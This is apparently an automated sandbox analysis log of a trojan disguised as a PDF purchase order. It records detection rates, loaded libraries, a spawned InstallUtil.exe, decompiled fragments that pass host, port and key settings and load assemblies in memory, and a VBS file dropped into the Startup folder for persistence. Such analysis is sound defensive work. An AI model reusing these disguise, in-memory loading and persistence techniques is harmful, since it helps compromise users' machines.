                Source: PO#8329837372938383839238PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO#8329837372938383839238PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PO#8329837372938383839238PDF.exeVirustotal: Detection: 33%
                Source: PO#8329837372938383839238PDF.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile read: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe "C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe"
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 904
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: PO#8329837372938383839238PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO#8329837372938383839238PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbYQXX source: InstallUtil.exe, 00000003.00000002.3397365470.00000000009F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbT source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.000000000463E000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261970867.00000000075C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbI source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.000000000463E000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261970867.00000000075C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbp' source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.00000000009F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdbtion source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbal source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdbed[ source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb( source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A54000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbJC source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB`w; source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A54000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb0. source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb03 source: InstallUtil.exe, 00000003.00000002.3397365470.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3396210878.00000000006F7000.00000004.00000010.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.PO#8329837372938383839238PDF.exe.45409d0.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.PO#8329837372938383839238PDF.exe.45409d0.3.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.PO#8329837372938383839238PDF.exe.45409d0.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.PO#8329837372938383839238PDF.exe.45409d0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.PO#8329837372938383839238PDF.exe.45409d0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.PO#8329837372938383839238PDF.exe.7400000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.PO#8329837372938383839238PDF.exe.7400000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.PO#8329837372938383839238PDF.exe.7400000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.PO#8329837372938383839238PDF.exe.7400000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.PO#8329837372938383839238PDF.exe.7400000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.cs.Net Code: Memory
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.74d0000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.44c3390.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2261337543.00000000074D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO#8329837372938383839238PDF.exe PID: 2104, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile created: C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbsJump to dropped file
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbsJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbsJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
